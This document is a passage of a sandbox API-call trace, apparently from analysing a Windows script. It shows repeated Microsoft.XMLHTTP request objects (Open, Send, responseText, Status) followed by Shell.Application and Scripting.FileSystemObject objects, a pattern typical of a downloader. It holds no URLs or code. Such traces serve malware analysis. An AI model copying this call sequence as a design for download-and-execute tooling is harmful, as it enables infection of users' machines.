	[0492.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0492.084] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0492.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0492.084] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0492.084] SysStringLen (param_1=0x0) returned 0x0
	[0492.084] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0492.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0492.085] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0492.085] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0492.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0492.085] ??2@YAPEAX_K@Z () returned 0x62f310
	[0492.085] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0492.085] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0492.085] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0492.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0492.085] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0492.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0492.085] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0492.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0492.085] longjmp () 
	[0492.086] longjmp () 
	[0492.086] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0492.086] SysStringLen (param_1=0x0) returned 0x0
	[0492.086] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0492.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0492.086] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0492.086] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0492.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0492.086] ??2@YAPEAX_K@Z () returned 0x62f330
	[0492.086] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
	[0492.086] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0492.086] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0492.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0492.086] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0492.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0492.087] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0492.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0492.087] longjmp () 
	[0492.087] longjmp () 
	[0492.087] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0492.087] SysStringLen (param_1=0x0) returned 0x0
	[0492.087] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0492.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0492.087] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0492.087] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0492.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0492.088] ??2@YAPEAX_K@Z () returned 0x62f310
	[0492.088] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0492.088] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0492.088] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0492.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0492.088] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0492.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0492.088] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0492.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0492.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0492.088] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0492.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0494.651] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0494.652] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0494.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0494.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0494.652] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0494.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0494.652] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0494.652] SysStringLen (param_1=0x0) returned 0x0
	[0494.652] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0494.653] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0494.653] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0494.653] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0494.653] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0494.653] ??2@YAPEAX_K@Z () returned 0x62f350
	[0494.653] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0494.653] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0494.653] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0494.653] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0494.653] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0494.653] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0494.653] SysStringLen (param_1=0x0) returned 0x0
	[0494.653] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0494.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0494.657] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0494.657] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0494.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0494.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0494.657] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0496.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0496.073] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0496.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0496.074] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0496.074] SysStringLen (param_1=0x0) returned 0x0
	[0496.074] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0496.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0496.075] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0496.075] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0496.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0496.075] ??2@YAPEAX_K@Z () returned 0x62f310
	[0496.075] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0496.075] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0496.075] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0496.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
